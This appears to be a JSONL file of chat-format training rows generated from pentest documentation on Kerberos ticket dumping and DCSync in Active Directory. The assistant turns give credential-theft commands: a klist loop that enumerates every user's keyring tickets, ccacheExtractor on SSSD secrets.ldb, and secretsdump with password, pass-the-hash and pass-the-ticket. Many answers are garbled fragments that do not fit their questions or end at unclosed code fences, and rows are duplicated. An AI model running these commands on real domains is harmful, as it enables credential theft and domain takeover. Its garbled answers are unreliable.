authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out List all tickets during a pentest?"}, {"role": "assistant", "content": "for uid in $(awk '{print$1}' /proc/key-users | tr -d :); do\n res=$(KRB5CCNAME=KEYRING:persistent:$uid klist 2>&1)\n if [ $? -eq 0 ]; then\n echo -e \"\\n=== UID $uid ===\"\n echo \"$res\"\n fi\ndone"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out List all tickets during a pentest?", "response": "for uid in $(awk '{print$1}' /proc/key-users | tr -d :); do\n res=$(KRB5CCNAME=KEYRING:persistent:$uid klist 2>&1)\n if [ $? -eq 0 ]; then\n echo -e \"\\n=== UID $uid ===\"\n echo \"$res\"\n fi\ndone", "metadata": {"corpus_index": 266, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Use a specific ticket"}, {"role": "assistant", "content": "KRB5CCNAME=KEYRING:persistent:$UID\n``\n\n> [!SUCCESS]\n> keyringCCacheDumper can automatically extract all tickets.\n\n== KCM Storage\nKCM stores credential material inside the SSSD secrets databas located at /var/lib/sss/secrets/secrets.ldb, typically only readable by root.\n\nCCacheExtractor can be used to extract tickets:\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Use a specific ticket", "response": "KRB5CCNAME=KEYRING:persistent:$UID\n``\n\n> [!SUCCESS]\n> keyringCCacheDumper can automatically extract all tickets.\n\n== KCM Storage\nKCM stores credential material inside the SSSD secrets databas located at /var/lib/sss/secrets/secrets.ldb, typically only readable by root.\n\nCCacheExtractor can be used to extract tickets:\n\n``bash", "metadata": {"corpus_index": 267, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Use a specific ticket"}, {"role": "assistant", "content": "KRB5CCNAME=KEYRING:persistent:$UID\n``\n\n> [!SUCCESS]\n> keyringCCacheDumper can automatically extract all tickets.\n\n== KCM Storage\nKCM stores credential material inside the SSSD secrets databas located at /var/lib/sss/secrets/secrets.ldb, typically only readable by root.\n\nCCacheExtractor can be used to extract tickets:\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Use a specific ticket", "response": "KRB5CCNAME=KEYRING:persistent:$UID\n``\n\n> [!SUCCESS]\n> keyringCCacheDumper can automatically extract all tickets.\n\n== KCM Storage\nKCM stores credential material inside the SSSD secrets databas located at /var/lib/sss/secrets/secrets.ldb, typically only readable by root.\n\nCCacheExtractor can be used to extract tickets:\n\n``bash", "metadata": {"corpus_index": 267, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Use a specific ticket?"}, {"role": "assistant", "content": "> [!SUCCESS]\n> [keyringCCacheDumper](https://github.com/Hakumarachi/keyringCCacheDumper) can automatically extract all tickets.\n\n== KCM Storage\nKCM stores credential material inside the SSSD secrets databas located at `/var/lib/sss/secrets/secrets.ldb`, typically only readable by root.\n\n[CCacheExtractor](https://github.com/Hakumarachi/ccacheExtractor) can be used to extract tickets:"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Use a specific ticket?", "response": "> [!SUCCESS]\n> [keyringCCacheDumper](https://github.com/Hakumarachi/keyringCCacheDumper) can automatically extract all tickets.\n\n== KCM Storage\nKCM stores credential material inside the SSSD secrets databas located at `/var/lib/sss/secrets/secrets.ldb`, typically only readable by root.\n\n[CCacheExtractor](https://github.com/Hakumarachi/ccacheExtractor) can be used to extract tickets:", "metadata": {"corpus_index": 268, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> [!SUCCESS]`?"}, {"role": "assistant", "content": "This command is used for use a specific ticket. Use a specific ticket"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> [!SUCCESS]`?", "response": "This command is used for use a specific ticket. Use a specific ticket", "metadata": {"corpus_index": 268, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Extract all tickets from LDB database"}, {"role": "assistant", "content": "python3 ccacheExtractor.py kcm ./secrets.ldb\n``\n\n> [!WARNING]\n> Before SSSD 2.0.0 (2018‑08‑13), the KCM back‑end encrypted Kerberos payloads in the secrets database using AES_256_CBC. The encryption key used to protect values stored in secrets.ldb is located at /var/lib/sss/secrets/.secrets.mkey.\n>\n> Extracting or decrypting these payloads in such environments requires using SSSDKCMExtractor\n\nExtracted tickets can then be used with Pass-the-cache or Pass-the-tickets depending on the ticket type.\n\n> [!SUCCESS]\n> KrbNixPwn can automatically extract all tickets - supporting FILE, DIR, KCM, and KEYRING caches in a single workflow.\n> `bash\n> ./KrbNixPwn.sh dump\n> `\n> or\n> `bash\n> ./KrbNixPwn.sh monitor\n> ``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Extract all tickets from LDB database", "response": "python3 ccacheExtractor.py kcm ./secrets.ldb\n``\n\n> [!WARNING]\n> Before SSSD 2.0.0 (2018‑08‑13), the KCM back‑end encrypted Kerberos payloads in the secrets database using AES_256_CBC. The encryption key used to protect values stored in secrets.ldb is located at /var/lib/sss/secrets/.secrets.mkey.\n>\n> Extracting or decrypting these payloads in such environments requires using SSSDKCMExtractor\n\nExtracted tickets can then be used with Pass-the-cache or Pass-the-tickets depending on the ticket type.\n\n> [!SUCCESS]\n> KrbNixPwn can automatically extract all tickets - supporting FILE, DIR, KCM, and KEYRING caches in a single workflow.\n> `bash\n> ./KrbNixPwn.sh dump\n> `\n> or\n> `bash\n> ./KrbNixPwn.sh monitor\n> ``", "metadata": {"corpus_index": 269, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Extract all tickets from LDB database"}, {"role": "assistant", "content": "python3 ccacheExtractor.py kcm ./secrets.ldb\n``\n\n> [!WARNING]\n> Before SSSD 2.0.0 (2018‑08‑13), the KCM back‑end encrypted Kerberos payloads in the secrets database using AES_256_CBC. The encryption key used to protect values stored in secrets.ldb is located at /var/lib/sss/secrets/.secrets.mkey.\n>\n> Extracting or decrypting these payloads in such environments requires using SSSDKCMExtractor\n\nExtracted tickets can then be used with Pass-the-cache or Pass-the-tickets depending on the ticket type.\n\n> [!SUCCESS]\n> KrbNixPwn can automatically extract all tickets - supporting FILE, DIR, KCM, and KEYRING caches in a single workflow.\n> `bash\n> ./KrbNixPwn.sh dump\n> `\n> or\n> `bash\n> ./KrbNixPwn.sh monitor\n> ``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Extract all tickets from LDB database", "response": "python3 ccacheExtractor.py kcm ./secrets.ldb\n``\n\n> [!WARNING]\n> Before SSSD 2.0.0 (2018‑08‑13), the KCM back‑end encrypted Kerberos payloads in the secrets database using AES_256_CBC. The encryption key used to protect values stored in secrets.ldb is located at /var/lib/sss/secrets/.secrets.mkey.\n>\n> Extracting or decrypting these payloads in such environments requires using SSSDKCMExtractor\n\nExtracted tickets can then be used with Pass-the-cache or Pass-the-tickets depending on the ticket type.\n\n> [!SUCCESS]\n> KrbNixPwn can automatically extract all tickets - supporting FILE, DIR, KCM, and KEYRING caches in a single workflow.\n> `bash\n> ./KrbNixPwn.sh dump\n> `\n> or\n> `bash\n> ./KrbNixPwn.sh monitor\n> ``", "metadata": {"corpus_index": 269, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Cached Kerberos tickets - From Windows"}, {"role": "assistant", "content": "Two practical approaches exist to extract Kerberos tickets on Windows systems:\n- Extracting tickets directly from an LSASS memory dump, and\n- Querying tickets through LSA APIs, which does not require reading raw LSASS memory.\n\nBoth require elevated permissions."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Cached Kerberos tickets - From Windows", "response": "Two practical approaches exist to extract Kerberos tickets on Windows systems:\n- Extracting tickets directly from an LSASS memory dump, and\n- Querying tickets through LSA APIs, which does not require reading raw LSASS memory.\n\nBoth require elevated permissions.", "metadata": {"corpus_index": 270, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Cached Kerberos tickets - From Windows during a pentest?"}, {"role": "assistant", "content": "Two practical approaches exist to extract Kerberos tickets on Windows systems:\n- Extracting tickets directly from an LSASS memory dump, and\n- Querying tickets through LSA APIs, which does not require reading raw LSASS memory.\n\nBoth require elevated permissions."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Cached Kerberos tickets - From Windows during a pentest?", "response": "Two practical approaches exist to extract Kerberos tickets on Windows systems:\n- Extracting tickets directly from an LSASS memory dump, and\n- Querying tickets through LSA APIs, which does not require reading raw LSASS memory.\n\nBoth require elevated permissions.", "metadata": {"corpus_index": 270, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Cached Kerberos tickets - Dumping from LSASS Memory in the context of penetration testing"}, {"role": "assistant", "content": "This method relies on parsing LSASS memory, where Kerberos tickets are stored in internal LSASS structures.\nIt is especially useful when you already exfiltrated an LSASS dump (.dmp, .bin, etc.).\n\nExamples with mimikatz :\n```powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Cached Kerberos tickets - Dumping from LSASS Memory in the context of penetration testing", "response": "This method relies on parsing LSASS memory, where Kerberos tickets are stored in internal LSASS structures.\nIt is especially useful when you already exfiltrated an LSASS dump (.dmp, .bin, etc.).\n\nExamples with mimikatz :\n```powershell", "metadata": {"corpus_index": 271, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Cached Kerberos tickets - Dumping from LSASS Memory?"}, {"role": "assistant", "content": "This method relies on parsing LSASS memory, where Kerberos tickets are stored in internal LSASS structures.\nIt is especially useful when you already exfiltrated an LSASS dump (.dmp, .bin, etc.).\n\nExamples with mimikatz :\n```powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Cached Kerberos tickets - Dumping from LSASS Memory?", "response": "This method relies on parsing LSASS memory, where Kerberos tickets are stored in internal LSASS structures.\nIt is especially useful when you already exfiltrated an LSASS dump (.dmp, .bin, etc.).\n\nExamples with mimikatz :\n```powershell", "metadata": {"corpus_index": 271, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Cached Kerberos tickets - Dumping from LSA APIs work?"}, {"role": "assistant", "content": "This method uses documented LSA APIs to enumerate, extract, or renew tickets through the Kerberos authentication package.\nIt still requires elevated rights but:\n- Works even on systems where LSASS is PPL-protected\n- Is more OPSEC-friendly (no suspicious LSASS read handle)\n\nExample with Rubeus :\n```powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Cached Kerberos tickets - Dumping from LSA APIs work?", "response": "This method uses documented LSA APIs to enumerate, extract, or renew tickets through the Kerberos authentication package.\nIt still requires elevated rights but:\n- Works even on systems where LSASS is PPL-protected\n- Is more OPSEC-friendly (no suspicious LSASS read handle)\n\nExample with Rubeus :\n```powershell", "metadata": {"corpus_index": 272, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Cached Kerberos tickets - Dumping from LSA APIs during a pentest?"}, {"role": "assistant", "content": "This method uses documented LSA APIs to enumerate, extract, or renew tickets through the Kerberos authentication package.\nIt still requires elevated rights but:\n- Works even on systems where LSASS is PPL-protected\n- Is more OPSEC-friendly (no suspicious LSASS read handle)\n\nExample with Rubeus :\n```powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Cached Kerberos tickets - Dumping from LSA APIs during a pentest?", "response": "This method uses documented LSA APIs to enumerate, extract, or renew tickets through the Kerberos authentication package.\nIt still requires elevated rights but:\n- Works even on systems where LSASS is PPL-protected\n- Is more OPSEC-friendly (no suspicious LSASS read handle)\n\nExample with Rubeus :\n```powershell", "metadata": {"corpus_index": 272, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/cached-kerberos-tickets.md", "page_title": "Cached Kerberos tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is DCSync - Theory?"}, {"role": "assistant", "content": "DCSync is a technique that uses Windows Domain Controller's API to simulate the replication process from a remote domain controller. This attack can lead to the compromise of major credential material such as the Kerberos krbtgt keys used legitimately for tickets creation, but also for tickets forging by attackers. The consequences of this attack are similar to an NTDS.dit dump and parsing but the practical aspect differ. A DCSync is not a simple copy & parse of the NTDS.dit file, it's a DsGetNCChanges operation transported in an RPC request to the DRSUAPI (Directory Replication Service API) to replicate data (including credentials) from a domain controller.\n\nThis attack requires domain admin privileges to succeed (more specifically, it needs the following extended privileges: DS-Replication-Get-Changes and DS-Replication-Get-Changes-All). Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default. In some cases, over-privileged accounts can be abused to grant controlled objects the right to DCSync.\n\n> [!TIP]\n> A setting exists in the account policy or when creating users telling the domain controller to store the user's password using reversible encryption instead of irreversible hashing. This allows attackers to retrieve the passwords in clear-text."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is DCSync - Theory?", "response": "DCSync is a technique that uses Windows Domain Controller's API to simulate the replication process from a remote domain controller. This attack can lead to the compromise of major credential material such as the Kerberos krbtgt keys used legitimately for tickets creation, but also for tickets forging by attackers. The consequences of this attack are similar to an NTDS.dit dump and parsing but the practical aspect differ. A DCSync is not a simple copy & parse of the NTDS.dit file, it's a DsGetNCChanges operation transported in an RPC request to the DRSUAPI (Directory Replication Service API) to replicate data (including credentials) from a domain controller.\n\nThis attack requires domain admin privileges to succeed (more specifically, it needs the following extended privileges: DS-Replication-Get-Changes and DS-Replication-Get-Changes-All). Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default. In some cases, over-privileged accounts can be abused to grant controlled objects the right to DCSync.\n\n> [!TIP]\n> A setting exists in the account policy or when creating users telling the domain controller to store the user's password using reversible encryption instead of irreversible hashing. This allows attackers to retrieve the passwords in clear-text.", "metadata": {"corpus_index": 273, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/dcsync.md", "page_title": "DCSync", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do DCSync - Theory"}, {"role": "assistant", "content": "DCSync is a technique that uses Windows Domain Controller's API to simulate the replication process from a remote domain controller. This attack can lead to the compromise of major credential material such as the Kerberos krbtgt keys used legitimately for tickets creation, but also for tickets forging by attackers. The consequences of this attack are similar to an NTDS.dit dump and parsing but the practical aspect differ. A DCSync is not a simple copy & parse of the NTDS.dit file, it's a DsGetNCChanges operation transported in an RPC request to the DRSUAPI (Directory Replication Service API) to replicate data (including credentials) from a domain controller.\n\nThis attack requires domain admin privileges to succeed (more specifically, it needs the following extended privileges: DS-Replication-Get-Changes and DS-Replication-Get-Changes-All). Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default. In some cases, over-privileged accounts can be abused to grant controlled objects the right to DCSync.\n\n> [!TIP]\n> A setting exists in the account policy or when creating users telling the domain controller to store the user's password using reversible encryption instead of irreversible hashing. This allows attackers to retrieve the passwords in clear-text."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do DCSync - Theory", "response": "DCSync is a technique that uses Windows Domain Controller's API to simulate the replication process from a remote domain controller. This attack can lead to the compromise of major credential material such as the Kerberos krbtgt keys used legitimately for tickets creation, but also for tickets forging by attackers. The consequences of this attack are similar to an NTDS.dit dump and parsing but the practical aspect differ. A DCSync is not a simple copy & parse of the NTDS.dit file, it's a DsGetNCChanges operation transported in an RPC request to the DRSUAPI (Directory Replication Service API) to replicate data (including credentials) from a domain controller.\n\nThis attack requires domain admin privileges to succeed (more specifically, it needs the following extended privileges: DS-Replication-Get-Changes and DS-Replication-Get-Changes-All). Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default. In some cases, over-privileged accounts can be abused to grant controlled objects the right to DCSync.\n\n> [!TIP]\n> A setting exists in the account policy or when creating users telling the domain controller to store the user's password using reversible encryption instead of irreversible hashing. This allows attackers to retrieve the passwords in clear-text.", "metadata": {"corpus_index": 273, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/dcsync.md", "page_title": "DCSync", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain DCSync - Practice"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nOn UNIX-like systems, this attack can be carried out with Impacket's secretsdump which has the ability to run this attack on an elevated context obtained through plaintext password stuffing, pass-the-hash or pass-the-ticket.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain DCSync - Practice", "response": "::: tabs\n\n=== UNIX-like\n\nOn UNIX-like systems, this attack can be carried out with Impacket's secretsdump which has the ability to run this attack on an elevated context obtained through plaintext password stuffing, pass-the-hash or pass-the-ticket.\n\n```bash", "metadata": {"corpus_index": 274, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/dcsync.md", "page_title": "DCSync", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do DCSync - Practice"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nOn UNIX-like systems, this attack can be carried out with Impacket's secretsdump which has the ability to run this attack on an elevated context obtained through plaintext password stuffing, pass-the-hash or pass-the-ticket.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do DCSync - Practice", "response": "::: tabs\n\n=== UNIX-like\n\nOn UNIX-like systems, this attack can be carried out with Impacket's secretsdump which has the ability to run this attack on an elevated context obtained through plaintext password stuffing, pass-the-hash or pass-the-ticket.\n\n```bash", "metadata": {"corpus_index": 274, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/dcsync.md", "page_title": "DCSync", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does using a plaintext password work?"}, {"role": "assistant", "content": "secretsdump -outputfile 'dcsync' -dc-ip \"$DC_IP\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"$DC_HOST\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does using a plaintext password work?", "response": "secretsdump -outputfile 'dcsync' -dc-ip \"$DC_IP\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"$DC_HOST\"", "metadata": {"corpus_index": 275, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/dcsync.md", "page_title": "DCSync", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for using a plaintext password"}, {"role": "assistant", "content": "secretsdump -outputfile 'dcsync' -dc-ip \"$DC_IP\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"$DC_HOST\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for using a plaintext password", "response": "secretsdump -outputfile 'dcsync' -dc-ip \"$DC_IP\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"@\"$DC_HOST\"", "metadata": {"corpus_index": 275, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/dcsync.md", "page_title": "DCSync", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about with Pass-the-Hash?"}, {"role": "assistant", "content": "secretsdump -outputfile 'dcsync' -hashes :\"$NT_HASH\" -dc-ip \"$DC_IP\" \"$DOMAIN\"/\"$USER\"@\"$DC_HOST\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about with Pass-the-Hash?", "response": "secretsdump -outputfile 'dcsync' -hashes :\"$NT_HASH\" -dc-ip \"$DC_IP\" \"$DOMAIN\"/\"$USER\"@\"$DC_HOST\"", "metadata": {"corpus_index": 276, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/dcsync.md", "page_title": "DCSync", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through with Pass-the-Hash"}, {"role": "assistant", "content": "secretsdump -outputfile 'dcsync' -hashes :\"$NT_HASH\" -dc-ip \"$DC_IP\" \"$DOMAIN\"/\"$USER\"@\"$DC_HOST\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through with Pass-the-Hash", "response": "secretsdump -outputfile 'dcsync' -hashes :\"$NT_HASH\" -dc-ip \"$DC_IP\" \"$DOMAIN\"/\"$USER\"@\"$DC_HOST\"", "metadata": {"corpus_index": 276, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/dcsync.md", "page_title": "DCSync", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain with Pass-the-Ticket"}, {"role": "assistant", "content": "KRB5CCNAME=ticket.ccache secretsdump -k -no-pass -outputfile 'dcsync' -dc-ip \"$DC_IP\" @\"$DC_HOST\"\n``\n\nThe secretsdump script creates the following files.\n\n| File | Content |\n| ---------- | --------------------------------------------------- |\n| .ntds | LM and NT password hashes |\n| .cleartext | Passwords stored using reversible encryption |\n| .kerberos | Kerberos keys (DES, AES128 and AES256) |\n| .sam | Domain controller's SAM secrets |\n| .secrets | Domain controller's LSA secrets |\n\nThis attack can also be operated with a relayed NTLM authentication, but only if the target domain controller is vulnerable to Zerologon since the DRSUAPI always requires signing.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain with Pass-the-Ticket", "response": "KRB5CCNAME=ticket.ccache secretsdump -k -no-pass -outputfile 'dcsync' -dc-ip \"$DC_IP\" @\"$DC_HOST\"\n``\n\nThe secretsdump script creates the following files.\n\n| File | Content |\n| ---------- | --------------------------------------------------- |\n| .ntds | LM and NT password hashes |\n| .cleartext | Passwords stored using reversible encryption |\n| .kerberos | Kerberos keys (DES, AES128 and AES256) |\n| .sam | Domain controller's SAM secrets |\n| .secrets | Domain controller's LSA secrets |\n\nThis attack can also be operated with a relayed NTLM authentication, but only if the target domain controller is vulnerable to Zerologon since the DRSUAPI always requires signing.\n\n``bash", "metadata": 